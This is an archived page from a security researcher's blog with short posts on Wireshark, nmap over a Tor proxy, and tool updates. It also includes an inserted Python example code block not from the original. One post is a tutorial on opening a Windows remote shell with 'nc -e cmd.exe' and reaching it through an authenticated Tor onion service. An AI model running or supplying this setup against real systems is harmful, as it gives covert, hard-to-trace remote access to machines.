Didier Stevens

Tuesday 27 February 2018

Wireshark Comments

Filed under: Networking,Wireshark — Didier Stevens @ 0:00

For NVISO, I’m providing Wireshark training at BruCON Spring 2018: Wireshark and Lua Programming.

In the following video, I show how to add comments to packets and capture files in Wireshark:

Monday 26 February 2018

Quickpost: Using nmap With Tallow (Tor proxy)

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Here’s how I used nmap with Tallow on Windows, a transparent Tor proxy:

The Tor network supports neither ICMP (hence -Pn) nor SYN scanning (hence TCP connect scanning, -sT).

The "Force web-only" flag blocks all ports except 80 and 443, which is why port 22 shows up as filtered.

Tuesday 20 February 2018

Update: pecheck.py Version 0.7.2

Filed under: My Software,Update — Didier Stevens @ 0:00

This is a bug fix version.

pecheck-v0_7_2.zip (https)
MD5: 2A501CD2D15E1108B909B7FCEDFBDA13
SHA256: 9CACA5A41A84049FE6B0D5807A31B7FC5B1A5AC71B3FD3BE4EAC71A96BBDFB3E

Monday 19 February 2018

Update: oledump.py Version 0.0.33

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of oledump can output the content of all streams in JSON format, and has a new plugin for MSI files: plugin_msi.py.

oledump_V0_0_33.zip (https)
MD5: E5F879766B5C1C899E75E2F2A8ED9533
SHA256: 2B7C9565880F14E8A431F7819926EE801DE129458E682FAAF99FEF41AFA49934

Sunday 18 February 2018

Update: translate.py Version 2.5.3

Filed under: My Software,Update — Didier Stevens @ 0:00

I had to be sure that every 4th byte in a file was identical:

After some thinking, I thought I could use my translate program to select every 4th byte (position % 4 == 3) and then calculate byte statistics. However, while translate.py can apply a (complex) Python expression/program to translate each byte of a file, it could not be used to select particular bytes. So I made a small change: if the Python expression used with translate.py returns the value None (instead of a numeric value), then that byte is not sent to the output. This way, input bytes can be dropped/deleted.
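To illustrate the "return None to drop a byte" mechanism, here is an added example (not translate.py's own code): a minimal per-byte translator with the same idea, used to keep only every 4th byte of a constructed input and check whether the selection is uniform. The variable names byte and position and the sample data are assumptions.

```python
import collections
from typing import Dict

# Constructed sample input: 64 four-byte records whose 4th byte is always 0x00,
# mimicking the file structure the post wanted to verify.
SAMPLE = bytes(
    b
    for i in range(64)
    for b in ((i * 7) & 0xFF, (i * 13) & 0xFF, (i * 3) & 0xFF, 0x00)
)


def translate(data: bytes, expression: str) -> bytes:
    """Evaluate a Python expression once per input byte (assumed variables:
    byte = value, position = 0-based offset). A numeric result is written out;
    a None result drops the byte, which is the selection trick described above."""
    code = compile(expression, "<expression>", "eval")
    out = bytearray()
    for position, byte in enumerate(data):
        # Builtins are removed so the expression only sees byte and position.
        result = eval(code, {"__builtins__": {}}, {"byte": byte, "position": position})
        if result is None:
            continue
        out.append(int(result) & 0xFF)
    return bytes(out)


def byte_statistics(data: bytes) -> Dict[str, object]:
    """Simple byte statistics of the (selected) output: length, distinct values, top 3."""
    counts = collections.Counter(data)
    return {"length": len(data), "unique": len(counts), "most_common": counts.most_common(3)}


def every_nth_byte_identical(data: bytes, n: int, offset: int) -> bool:
    """Select bytes at position % n == offset via the None trick and check uniformity."""
    selected = translate(data, f"byte if position % {n} == {offset} else None")
    return byte_statistics(selected)["unique"] <= 1
```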

translate_v2_5_3.zip (https)
MD5: F3C01FCA74A84F1712BAF187E9FE479F
SHA256: 4CA311456EDE5A43097D4E567F225CFF2A68D47B96A261FC935F2A0F1CD4EB0F

Monday 12 February 2018

Update: pdfid.py Version 0.2.4

Filed under: My Software,Update — Didier Stevens @ 0:00

This is a bug fix version for bugs reported by different users; more details are in the history.

pdfid_v0_2_4.zip (https)
MD5: 36D5554BC881E7E21382ADA1305ED6F4
SHA256: C1DA287C9C06E3158F79CECF9C2E9A7773FC57FC92021F17B79DDD4B1E5DBB2A

Sunday 11 February 2018

Update: jpegdump.py Version 0.0.4

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of jpegdump adds option -e: extract jpeg images to disk.

jpegdump_V0_0_4.zip (https)
MD5: 496B6F2B0C0EEF919F7C6E20B9C1ADF6
SHA256: 5D150AE050610B6DB11FBE8B44E385A80800971AF1810F67531BB17A1373C770

Saturday 10 February 2018

Update: hash.py Version 0.0.2

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of hash.py can recurse into directories by using new option --recursedir.

hash_V0_0_2.zip (https)
MD5: 7C9EF6D52793D6FFAAF4EB6FCEB934B4
SHA256: F768BCBE035ADF099C2AFA41CADB2ABD9514D54E6D361AF5610277B8A70D6B7D

Tuesday 6 February 2018

Update: python-per-line version 0.0.3

Filed under: My Software,Update — Didier Stevens @ 0:00

This new version of python-per-line adds option -i to ignore errors when evaluating the provided Python expression.

python-per-line_V0_0_3.zip (https)
MD5: 40B787E184EBAAD91A9104BF1BF1BF1A
SHA256: 1D7CAE95B5EA169286E4B1528D834D814A474A86240B9975385968B2BADF59AB

Monday 5 February 2018

Quickpost: Remote Shell On Windows Via Tor Onion Service

Filed under: Networking,Quickpost — Didier Stevens @ 0:00

Creating a Tor onion service (aka hidden service) on a Windows Tor client.

I download the Tor expert bundle (this works with the Tor Browser too).

I create Tor configuration file torrc with these lines:

HiddenServiceDir C:\demo\Tor\service
HiddenServicePort 8662 127.0.0.1:12345

When Tor is started, folder C:\demo\Tor\Service will be created and populated with a couple of files (file hostname contains the .onion address created by Tor for this onion service).

The onion service will be listening on port 8662, and traffic will be forwarded to 127.0.0.1 port 12345.

It is possible to enable client authorization for this service (without client authorization, everybody who knows the .onion address and the port can connect to it). Basic client authorization uses a shared secret, and is configured with this line (torrc):

HiddenServiceAuthorizeClient basic testuser

I choose testuser as name for the client.

I start Tor with configuration file torrc like this: tor.exe -f torrc

The .onion address and client authorization cookie can be found in file hostname in the service folder:

nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g # client: testuser

Keep the authorization cookie secret, of course; I show it here only for the demo.

Now start the service on the target Windows machine with nc.exe (I downloaded nc.exe years ago, I don’t have the original URL anymore, my version is 1.11 with MD5 ab41b1e2db77cebd9e2779110ee3915d):

nc -e cmd.exe -L -s 127.0.0.1 -p 12345

Tor expert bundle and nc.exe have no extra dependencies (like DLLs), and can be executed as normal user.

Now the target machine is ready.

On another machine, I start Tor with a configuration file containing the authorization cookie:

HidServAuth nybjuivgocveiyeq.onion Wa5kOshPqZF4tFynr4ug1g

And then I run ncat, because ncat.exe supports socks5 proxies (nc.exe doesn’t):

ncat.exe --proxy 127.0.0.1:9050 --proxy-type socks5 nybjuivgocveiyeq.onion 8662

This gives me a remote shell:

Note that this does not work with version 7.60 of ncat, apparently because of a regression bug:

libnsock select_loop(): nsock_loop error 10038: An operation was attempted on something that is not a socket.
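As an added example (not part of the original post or of Tor), here is a small audit of the torrc directives used above: it groups HiddenServiceDir/HiddenServicePort/HiddenServiceAuthorizeClient lines per service and reports the services that have no client authorization, i.e. the ones anybody who knows the .onion address and port can reach. The torrc content and paths are constructed for the example.

```python
from dataclasses import dataclass, field
from typing import List

# Constructed torrc modelled on the post: one service with basic client
# authorization, a second one without it. Paths are placeholders.
TORRC = """\
SocksPort 9050
HiddenServiceDir C:\\demo\\Tor\\service
HiddenServicePort 8662 127.0.0.1:12345
HiddenServiceAuthorizeClient basic testuser
HiddenServiceDir C:\\demo\\Tor\\service2   # no HiddenServiceAuthorizeClient
HiddenServicePort 80 127.0.0.1:8080
"""


@dataclass
class OnionService:
    directory: str
    ports: List[str] = field(default_factory=list)
    authorized_clients: List[str] = field(default_factory=list)


def parse_onion_services(torrc: str) -> List[OnionService]:
    """Each HiddenServiceDir line starts a new service; the HiddenService*
    lines that follow it belong to that service (Tor's grouping rule)."""
    services: List[OnionService] = []
    for raw in torrc.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and whitespace
        if not line:
            continue
        key, _, value = line.partition(" ")
        value = value.strip()
        if key == "HiddenServiceDir":
            services.append(OnionService(directory=value))
        elif key == "HiddenServicePort" and services:
            services[-1].ports.append(value)
        elif key == "HiddenServiceAuthorizeClient" and services:
            # Syntax: "<basic|stealth> name1,name2,..."
            _, _, names = value.partition(" ")
            services[-1].authorized_clients.extend(n for n in names.split(",") if n)
    return services


def unauthenticated_services(torrc: str) -> List[str]:
    """Directories of services reachable by anyone holding the .onion address."""
    return [s.directory for s in parse_onion_services(torrc) if not s.authorized_clients]
```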
